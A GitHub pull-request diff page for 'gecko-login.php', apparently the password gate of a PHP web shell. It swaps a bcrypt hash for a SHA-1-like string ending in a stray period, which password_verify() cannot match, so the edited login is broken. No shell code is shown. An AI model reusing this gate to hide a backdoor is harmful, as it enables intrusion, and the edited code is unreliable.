Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
2 changes: 1 addition & 1 deletion gecko-login.php
Original file line number Diff line number Diff line change
Expand Up @@ -60,7 +60,7 @@ function show_login_page($message = "")
}

if (!isset($_SESSION['authenticated'])) {
$stored_hashed_password = '$2y$10$ACTF7jbtyof6YoTCqitwLOxQ9II8xitPKC4pNi6SQjZM3HXkKiCZ.'; // Use PASSWORD_DEFAULT hash u can use this site https://phppasswordhash.com/ for generate ur password > Gunakan hash PASSWORD_DEFAULT Anda dapat menggunakan situs ini https://phppasswordhash.com/ untuk menghasilkan kata sandi Anda
$stored_hashed_password = '0aae4831c3bcd511480ac20355d0df4534114253.'; // Use PASSWORD_DEFAULT hash u can use this site https://phppasswordhash.com/ for generate ur password > Gunakan hash PASSWORD_DEFAULT Anda dapat menggunakan situs ini https://phppasswordhash.com/ untuk menghasilkan kata sandi Anda

if (isset($_POST['pass']) && password_verify($_POST['pass'], $stored_hashed_password)) {
$_SESSION['authenticated'] = true;
Expand Down